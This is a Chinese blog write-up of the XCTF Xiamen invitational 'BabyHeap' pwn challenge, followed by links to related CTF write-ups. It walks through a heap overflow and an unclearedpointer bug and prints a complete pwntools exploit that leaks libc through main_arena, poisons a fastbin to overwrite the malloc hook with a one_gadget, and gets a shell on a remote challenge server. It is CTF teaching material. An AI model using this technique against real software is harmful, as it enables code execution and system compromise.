厦门邀请赛 pwn2 XCTF

最新推荐文章于 2022-11-30 17:38:02 发布
原创 最新推荐文章于 2022-11-30 17:38:02 发布 · 705 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细解析了BabyHeap题目中的漏洞利用过程,包括任意读写堆块、绕过堆块大小限制、填充00以及打印main_arena地址等关键步骤。通过Python脚本实现了攻击流程,最终利用one_gadget完成攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这个题 看起来是一个无懈可击的堆题

典型的 堆菜单题 然后看一下函数里面有没有什么利用的点

这里   感觉没有什么利用的点  然后我们往下看

 

这里的修改长度是我们自己输入 也就是我们自己定的  长度 那么我们就可以 实现堆块任意输入

然后继续往下看

 

这里可以有些麻烦 输出的内容长度被限定在了 一开始的堆块大小   这个 可能需要一些绕过

然后看一下 dele

其实dele 这里做的已经很不错了  但是也是没有把用户指针给 清理掉

那么 我们就 get到了这个题的姿势

首先可以任意读写 堆块 然后可以又没有清理用户指针 然后我们可以 伪造堆块  绕过堆块大小

然后可以 填充   00 然后 可以 打印main_arena  然后直接一把梭就可以了

#!/usr/bin/python2
# -*- coding:utf-8 -*-

from pwn import*
context.log_level="debug"
io=remote('111.198.29.45',43812)
#io=process("./babyheap")
elf=ELF("./babyheap")
libc=ELF("./libc-2.23.so")
one_gadget_addr= 0x4526a
def add(size,content):
	io.recvuntil(">> ")
	io.sendline("1")
	io.sendline(str(size))
	io.send(content)

def edit(index,size,content):
	io.recvuntil(">> ")
	io.sendline("2")
	io.sendline(str(index))
	io.sendline(str(size))
	io.send(content)

def show(index):
	io.recvuntil(">> ")
	io.sendline("3")
	io.sendline(str(index))

def dele(index):
	io.recvuntil(">> ")
	io.sendline("4")
	io.sendline(str(index))


if __name__ =='__main__':
	add(0x20,'a'*0x20)
	add(0x80,'b'*0x80)
	add(0x80,'c'*0x80)
	add(0x80,'c'*0x80)
	dele(1)
	payload='a'*0x20+p64(0)+p64(0x121)
	edit(0,len(payload),payload)
	payload='b'*0x80+p64(0)+p64(0x91)+'e'*0x80
	add(0x110,payload)
	dele(2)
	#gdb.attach(io)
	show(1)
	io.recvuntil('\x91\x00\x00\x00\x00\x00\x00\x00')
	main_arena_addr=u64(io.recv(6).ljust(8, '\x00'))-88
	log.success("main_arena_addr"+hex(main_arena_addr))
	libc_base_addr=main_arena_addr-0x3C4B20
	log.success("libc_base_addr"+hex(libc_base_addr))
	one_gadget_addr=one_gadget_addr +libc_base_addr
	fake_chunk_addr=main_arena_addr-0x33
	add(0x60,'d'*0x60)
	add(0x60,'d'*0x60)
	dele(4)
	payload='d'*0x80+p64(0)+p64(0x71)+p64(fake_chunk_addr)
	edit(3,len(payload),payload)
	add(0x60,'d'*0x60)

	payload=0x13 * 'a'+p64(one_gadget_addr)
	add(0x60,payload.ljust(0x60,'a'))
	#gdb.attach(io)
	add(0x90,'s'*0x90)
	io.interactive()
	io.close()

 

cgpwn2(xctf)
weixin_43868725的博客
05-06 409
0x0 程序保护和流程 保护: 流程: main() hello() 可以发现在hello()中存在栈溢出。 0x1 利用过程 在函数窗口中发现了system()函数,所以我们只需要字符串"/bin/sh"。就可以getshell了。仔细观察程序可以发现name变量是全局变量存放在.bss段中。 所以我们只需要向name中输入"/bin/sh",s=‘a’*(0x26+4)+p32(sys...
xman 厦门邀请赛 pwn1 babystack writeup
qq_39596232的博客
09-07 609
题目描述: 这个题目针对现在的我还是有点难度的,花费了我三天的时间,最后发现原因竟是因为字符转化为整型的过程中多加了好多0. 分析思路: 1、首先查看文件的详细信息: tucker@ubuntu:~/xman/pwn/pwn1$ file babystack babystack: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), d...
XCTF PWN level2
prettyX的博客
06-10 306
查看基本信息 尝试运行 IDA F5 继续查看脆弱函数,88h的缓冲区可以写入0x100,发现溢出点 shift+F12,发现了“/bin/sh”
[XCTF-pwn] 15_厦门邀请赛-pwn
weixin_52640415的博客
03-04 395
同样是写溢出到return的题,这题设置了canary,canary这个机制是把一个0+7位随机数放在rbp的前面,如果发现被改动就调用check_stack_fail然后退出。 这个题有循环,只有退出时才会检查,所以在前边可以输入适当长度带出canary在退出前再恢复 from pwn import * ''' patchelf --set-interpreter /home/shi/buuctf/buuoj_2.23_amd64/ld_2.23-0ubuntu10_amd64.so pwn
(攻防世界)(pwnpwn1(厦门邀请赛)babystack
PLpa的博客
07-21 2845
canary!canary!canary! 拿到题目,下载附件,查看保护。 可以很清楚的看到,程序开了canary,这就说明我们不能实现暴力的栈溢出,还要考虑这个canary的值。 我们首先运行一下程序: 可以很清楚的看出程序的功能,当我们选择1时,我们就可以输入,当我们选择2时,我们可以输出我们前面输入的东西。 进入IDA看源代码: 我们可以看到canary的值存放在v6里,v6距离rbp...
邀请赛misc key
afu42832的博客
09-24 863
目录 题目下载 提示 解题过程 1.提取RGB值 2.找到key 3.循环异或,得到flag 反思 题目下载 题目名:key 提示 提取钥匙中特殊颜色的RGB循环异或KEY值 解题过程 1....
pwn1 babystack [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列19
重新启程
12-25 1814
题目地址:pwn1 babystack 已经到了高手进阶区的第八题了,已经渐入佳境了。哈哈! 废话不说,看看题目先 厦门邀请赛的题目,还是2星难度,那就开工了。 管理检查一下保护机制: [*] '/ctf/work/python/pwn1/babystack' Arch: amd64-64-little RELRO: Full RELRO Stac...
0x00 cg_pwn2XCTF攻防世界pwn系列writeup】
weixin_36711901的博客
11-20 524
目录一、基本情况分析:二、构造payload:三、EXP:合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 一、基本情况分析: 首先对可执行文件进行基本检查: 如图所示,该文件为32位i386的ELF可执行文件,只开启了NX,RELRO(部分
pwn1(xctf)
weixin_43868725的博客
08-08 562
0x0 程序保护和流程 保护: 流程: 输入1能够读入长度为0x100的字符串到s而s距离rbp的距离为0x90存在明显的栈溢出,输入2能够输出s,输入3则退出程序。 0x1 利用过程 1.因为程序保护中开启了canary所以直接进行栈溢出就会触发canary。所以可以利用puts函数的特性一直输出字符直到遇到**\x00**,将canary的值输出出来。当输入0x87*‘a’+’/n’时不会有多余数据输出,而当输入0x88*‘a’+’/n’就会有多余数据输出,说明canary中有**\x00**。
XCTF hello_pwn题目
weixin_45643931的博客
11-14 2560
第一个题目通过EXP脚本连接上就出现了flag,懒得写WP 这个题目是XCTF的第二个题,也是我接触的第一个正式的pwn题目 直接下载附件 之后用IDA打开 打开以后,也不是很确定干啥,就直接ALT+T (搜索) 搜索CTF,flag之类的 之后就搜到了CTF的一句话 双击进去 然后按下F5 查看伪代码 而这里的if语句告诉了我们很多信息,如果XXX,就OOO双击函数进去 分析一下,应该是当…6C = 1853186401 时进入…0686()函数获得flag。 而这两个数据相差4个字节,更方便通过
2019CCPC厦门
wzw
10-20 855
2019CCPC厦门站 热身赛 没啥亮点,除了这道热身赛防穿题,队友认识其中两个,然后剩下的三个全排列枚举的,教练:没看过这个等于ACM没有入门!!! 正式赛 A题:不得不说开场又是去年徐州的重现,全场开G结果都wa掉,队友跟着上去交了一发也是wa,然后果断换做A题,和cyy讨论了一下上去写了个dfs排序就A了,J题zy看出来结论和我讨论了一下我上去写了个换根就过了,然后cyy接着上去...
XCTF_asong_WP
qq_43445167的博客
03-07 513
确实恶心。 本题的整体逻辑是通过输入的字符串变换that_girl文件,再把变换的数据写入out文件。属于已知密文求明文。 整体逻辑是通过对that_girl文本文件进行词频分析。 将输入的字符串转换为对应词频数组v1。 对v1进行类似与a=b,b=c,c=a 的元素顺序交换,记为v2。 将整个v2视为一整个二进制流循环左移3位,记为v3。 将v3写入out文件 解密脚本如下: #includ...
pwn1-厦门邀请赛
m0_55906008的博客
11-30 320
ctf pwn1 厦门邀请赛
[XCTF-Reverse] 62 XCTF 4th-QCTF-2018_asong
weixin_52640415的博客
03-24 536
这是个比较正规的逆向题 主程序先读入flag然后打开一个文档并统计字频然后加密输出到out文件 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { void *v3; // ST00_8 const char *v4; // ST08_8 v3 = malloc(0xBCuLL); v4 = (const char *)malloc(0x50uLL); init_0(); read_flag((__int64
溢出练习题pwn1
Elvira
08-26 5233
集训慢慢接近了尾声,樊荣学长给我们jian
CTF隐写术--安女神,我爱你!
Unitue_逆流
01-24 3843
使用工具进行答题 解题步骤 使用Notepid++进行分析发现存在一个key.txt文档 1、将安女神的图片载入,进行分析,点击Analyse分析 得出分析结果,发现一个Key.txt文档 2、将照片改为.zip形式 3、打开key.txt文档,然后出现如下图所示 对密文进行MD5在线解密,得到key
XCTF 3rd-GCTF-2017 hackme
qq_41071646的博客
05-07 1787
这个题 有字符串 感觉简单了许多 然后这个题 算法就在这 我们写出来脚本就行 #include <stdio.h> #include<iostream> #include<iomanip> #include<stdio.h> #include<string.h> #include<algorithm> #incl...
第五届CCF大数据与计算智能大赛决战巅峰,百万大奖汇聚海内外数据科学家
imgxr的博客
09-30 957
摘要:9月24日,第五届中国计算机学会(CCF)大数据与计算智能大赛(Big Data &amp; Computing Intelligence Contest,简称“BDCI”)启动仪式在北京梅地亚中心酒店正式举办。 时下的大数据已进入以数据广泛关联、跨域融合和深度应用为特征的智慧化阶段。数据已经成为战略资源及经济资产,通过机器学习方法来挖掘分析海量数据,鼓励学科交叉跨界合作,探索以大数据...
misc记录
Daniel的博客
07-15 673
0x01: 题目下载下来解压就是这张图片 这是一种比较少见的隐写,可以用这个工具来完成 打开软件, 选择extract 选择下载的egg.jpg,然后会生成一个txt文件,flag就在文件里 0x02: 下载文件用winrar解压出一张图片,由文件名的大写字母联想NTFS文件流,选择lads进行查看 看到文件后有NTFS文件流,然后 就能看到flag
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值